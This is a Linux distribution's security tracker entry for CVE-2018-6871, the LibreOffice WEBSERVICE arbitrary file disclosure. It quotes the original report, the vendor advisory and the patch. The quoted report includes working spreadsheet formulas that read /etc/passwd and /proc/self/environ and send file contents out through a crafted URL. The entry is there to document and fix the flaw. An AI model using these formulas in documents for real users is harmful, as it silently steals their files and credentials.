CLD-286 Details

Other IDs this deficiency may be known by:

CVE ID CVE-2018-6871 (nvd) (mitre) (debian) (archlinux) (red hat) (suse) (ubuntu)
Other ID(s)

Basic Information:

Affected Package(s) libreoffice
Deficiency Type SECURITY
Date Created 2018-02-09 19:10:40
Date Last Modified 2018-02-22 12:13:12

Version Specific Information:

Cucumber 1.0 i686 fixed in libreoffice-5.3.7.2-i686-2
Cucumber 1.0 x86_64 fixed in libreoffice-5.3.7.2-x86_64-2

Cucumber 1.1 i686 fixed in libreoffice-5.3.7.2-i686-2
Cucumber 1.1 x86_64 fixed in libreoffice-5.3.7.2-x86_64-2

Details:

********* THIS VULNERABILITY HAS THE DUPLICATE CVE ID OF CVE-2018-1055 *********

The ID CVE-2018-6871 should be used instead of CVE-2018-1055. See:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1055

=================================== Overview ===================================

LibreOffice through 6.0.1 allows remote attackers to read arbitrary files via
=WEBSERVICE calls in a document, which use the COM.MICROSOFT.WEBSERVICE
function.

================================ Initial Report ================================

From https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure:

Vulnerability description

CVE-2018-6871
First part

LibreOffice supports COM.MICROSOFT.WEBSERVICE function:

https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

The function is required to obtain data by URL, usually used as:

=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

In original:

For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE
returns the #VALUE! error value.

In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.
Second part

By default the cells are not updated, but if you specify the cell type like
~error, then the cell will be updated when you open document.
Exploitation

To read file you need just:

=WEBSERVICE("/etc/passwd")

This function can also be used to send a file:

=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

For successful operation, you need to send the files of the current user, so
you need to retrieve current user home path.

=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

Also you can parse other files too, like a ~/.ssh/config or something like
that.

For other than LibreOffice Calc formats you just need embed calc object to
other document (I checked it works).
Impact

It is easy to send any files with keys, passwords and anything else. 100%
success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all
operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in
almost all formats supporting by LO.
Acknowledgment

Vulnerability was independently found by me (@jollheef) and Ronnie Goodrich &&
Andrew Krasichkov (according to LibreOffice team notes).

============================ Additional Information ============================

From the official LibreOffice security advisory
(https://www.libreoffice.org/about-us/security/advisories/cve-2018-1055/):

Announced: February 9, 2018

Fixed in: LibreOffice 5.4.5/6.0.1

Description:

LibreOffice Calc supports a WEBSERVICE function to obtain data by URL.
Vulnerable versions of LibreOffice allow WEBSERVICE to take a local file URL
(e.g file://) which can be used to inject local files into the spreadsheet
without warning the user. Subsequent formulas can operate on that inserted data
and construct a remote URL whose path leaks the local data to a remote
attacker.

In later versions of LibreOffice without this flaw, WEBSERVICE has now been
limited to accessing http and https URLs along with bringing WEBSERVICE URLs
under LibreOffice Calc's link management infrastructure.


All users are recommended to upgrade to LibreOffice >= 5.4.5 or >= 6.0.1

Thanks to Ronnie Goodrich and Andrew Krasichkov for discovering this flaw.

================================= Our Analysis =================================

----- Affected Products -----
Versions of LibreOffice prior to 6.0.1 and 5.4.5 that have not had the patch
from
https://cgit.freedesktop.org/libreoffice/core/commit/?h=libreoffice-5-4-5&id=a916fc0c0e0e8b10cb4158fa0fa173fe205d434a
applied are vulnerable to this vulnerability. This includes LibreOffice as
originally packaged on Cucumber Linux 1.0 and 1.1. Versions greater than or
equal to 6.0.1 or 5.4.5 are not affected.

----- Scope and Impact of this Vulnerability -----
This vulnerability allows a remote attacker to read an arbitrary file via a
specially crafted document. All that is required from the end user is opening
the malicious document in an affected version of LibreOffice.

----- Fix for this Vulnerability -----
This vulnerability can be fixed by upgrading to LibreOffice 6.0.1 or 5.4.5 or by
applying the patch from
https://cgit.freedesktop.org/libreoffice/core/commit/?h=libreoffice-5-4-5&id=a916fc0c0e0e8b10cb4158fa0fa173fe205d434a.

================================= Our Solution =================================

We have applied the aforementioned patch and rebuilt.